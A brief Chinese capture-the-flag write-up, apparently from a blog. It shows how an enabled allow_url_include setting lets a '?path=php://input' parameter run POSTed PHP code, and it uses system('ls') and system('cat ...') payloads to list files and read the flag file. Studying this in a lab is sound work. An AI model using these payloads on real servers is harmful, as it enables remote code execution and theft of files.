版权声明:a3uRa QQ:962620891 github:asuralinmo.github.io https://blog.csdn.net/qq_41173457/article/details/82949701
phpinfo内容
发现allow_url_include开启
即允许php://input的形式,并将post的数据,作为php代码执行
?path=php://input
post:<?php system("ls");?>
得到
dle345aae.php index.php phpinfo.php
猜测flag应该在dle345aae.php里面
post:<?php system("cat dle345aae.php");?>
查看源代码 发现flag